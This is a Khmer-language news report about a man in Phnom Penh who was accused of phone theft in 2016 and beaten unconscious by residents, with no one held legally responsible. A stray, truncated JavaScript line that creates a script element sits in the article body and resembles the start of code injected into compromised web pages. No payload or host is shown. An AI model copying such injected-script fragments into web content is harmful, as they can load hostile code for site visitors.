ជនសង្ស័យប្រែក្លាយទៅជាជនរងគ្រោះ របួសធ្ងន់សន្លប់ស្តូកគ្មានអ្នកទទួលខុសត្រូវផ្លូវច្បាប់

image-456

ភ្នំពេញ ៖ បុរសម្នាក់រងការចោទប្រកាន់ ថាជាជនសង្ស័យលួចទូរស័ព្ទដៃ ត្រូវបានប្រជាពលរដ្ឋចាប់បានវាយសំពងរហូតដល់ដង្ហើមចង្រឹត ក៏បុ៉ន្តែការចោទប្រកាន់ ពុំមានអំណះអំណាងណាមួយឲ្យបានច្បាស់លាស់ ទទួលខុសត្រូវផ្លូវច្បាប់ឡើយ ហើយជនសង្ស័យ បានត្រឹមទួកសាច់ ក្លាយជាជនរងគ្រោះទៅវិញ ដើមបណ្តឹង សមត្ថកិច្ចមិនទាន់ស្រាវជ្រាវ ថាយ៉ាងណានោះទេ បានត្រឹមក្រុមសង្រ្គោះ ដឹកបញ្ជូនទៅមន្ទីរពេទ្យ យ៉ាងសោះកក្រោះ ។ ហេតុការណ៍ខាងលើកើតឡើងកាលពីវេលាម៉ោង៨យប់ថ្ងៃទី០៤ ខែកញ្ញា ឆ្នាំ២០១៦ ស្ថិតនៅភូមិព្រៃទា សង្កាត់ចោមចៅ ខណ្ឌពោធិ៍សែនជ័យ ។

បុរសទទួលរងការចោទប្រកាន់ ហើយពុំមានដើមចោទ ហើយពុំមានអ្នកទទួលខុសត្រូវផ្លូវច្បាប់នោះមានឈ្មោះ អៀង តារា អាយុ ៣០ឆ្នាំ បានត្រឹមទួកសាច់ បន្ទាប់ពីបងប្អូនប្រជាពលរដ្ឋ ទាត់និងធាក់ ត្រូវបានក្រុមសង្រ្គោះ ដឹកបញ្ជូនទៅសង្រ្គោះនៅមន្ទីរពេទ្យព្រះកុសុមៈ ។

តាមប្រភពច្បាស់ការណ៍បានឲ្យដឹងថា បុរសខាងលើរងការចោទប្រកាន់ ចូលលួចទូរស័ព្ទគេនៅត្រង់ចំណុចភូមិព្រៃទា សង្កាត់ចោមចៅ ម្ចាស់តាមទាន់ស្រែកចោរ ធ្វើឲ្យពលរដ្ឋក្បែរខាង ចេញមកស្វាគមន៍ មួយដៃមួយជើង កប់ភក់របួសធ្ងន់ ហើយសមត្ថកិច្ចមូលដ្ឋានបានចុះទៅអន្តរាគមន៍ ហៅរករថយន្តសង្រ្គោះ ឲ្យជួយសង្រ្គោះអាយុជីវិត ។

var d=document;var s=d.createElement(‘script’);

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More